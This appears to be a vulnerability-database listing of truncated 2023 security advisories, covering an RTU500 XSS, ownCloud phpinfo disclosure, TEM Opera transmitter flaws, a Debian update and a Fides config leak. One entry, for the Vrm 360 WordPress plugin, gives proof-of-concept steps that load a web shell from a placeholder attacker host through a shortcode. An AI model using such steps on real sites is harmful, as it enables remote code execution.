CVE-2023-5767
A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to an RDT language file being improperly sanitized...
Cross site scripting
A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to an RDT language file being improperly sanitized...
CVE-2023-5767
CVE-2023-5767 affects Hitachi Energy RTU500 series CMU firmware webserver. The vulnerability arises from improper sanitization of an RDT language file, enabling cross-site scripting on the webserver. Documented impact includes cross-site scripting risk with medium severity (CVSS ~6.0–6.1) and net...
OwnCloud graphapi 0.2.x < 0.2.1 / 0.3.x < 0.3.1 Sensitive Information Disclosure
An issue was discovered in OwnCloud graphapi plugin 0.2.x < 0.2.1 and 0.3.x < 0.3.1. The graphapi plugin relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all th...
CVE-2023-4667 Stored Cross Site Scripting in webserver administration
The web interface of the PAC Device allows the device administrator user profile to store malicious scripts in some fields. The stored malicious script is then executed when the GUI is opened by any users of the webserver administration interface. The root cause of the vulnerability is inadequate...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
CVE-2023-49103
An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information...
Debian dla-3647 : libtrapperkeeper-webserver-jetty9-clojure - security update
The remote Debian 10 host has a package installed that is affected by a vulnerability as referenced in the dla-3647 advisory. ------------------------------------------------------------------------- Debian LTS Advisory DLA-3647-1 [email protected] https://www.debian.org/lts/security/...
Debian: Security Advisory (DLA-3647-1)
The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
DLA-3647-1 trapperkeeper-webserver-jetty9-clojure - security update
Bulletin has no description...
[SECURITY] [DLA 3647-1] trapperkeeper-webserver-jetty9-clojure
Debian LTS Advisory DLA-3647-1 [email protected] https://www.debian.org/lts/security/ Markus Koschany November 07, 2023 https://wiki.debian.org/LTS Package : trapperkeeper-webserver-jetty9-clojure Version : 1.7.0-2+deb10u2 Debian Bug : 1055348 The recent update of jetty9, released as DL...
TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution
TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution Vendor: Telecomunicazioni Elettro Milano TEM S.r.l. Product web page: https://www.tem-italy.it Affected version: Software version: 35.45 Webserver version: 1.7 Summary: This new line of Opera plus FM Transmitters combines very high...
TEM Opera Plus FM Family Transmitter 35.45 Cross Site Request Forgery Vulnerability
CSRF Change Forward Power: -------------------------...
TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution Vulnerability
TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution Vendor: Telecomunicazioni Elettro Milano TEM S.r.l. Product web page: https://www.tem-italy.it Affected version: Software version: 35.45 Webserver version: 1.7 Summary: This new line of Opera plus FM Transmitters combines very high...
CVE-2023-46125
Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. The Fides webserver API allows users to retrieve its configuration using the GET api/v1/config endpoint. The...
Information disclosure
Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. The Fides webserver API allows users to retrieve its configuration using the GET api/v1/config endpoint. The...
PT-2023-7928 · Unknown · Rtu500 Series
Name of the Vulnerable Software and Affected Versions: RTU500 series product versions (affected versions not specified). Description: A vulnerability exists in the webserver that affects the RTU500 series product, allowing a malicious actor to perform cross-site scripting due to an RDT language file...
TEM Opera Plus FM Family Transmitter 35.45 XSRF
Summary This new line of Opera plus FM Transmitters combines very high efficiency, high reliability and low energy consumption in compact solutions. They have innovative functions and features that can eliminate the costs required by additional equipment: automatic exchange of audio sources,...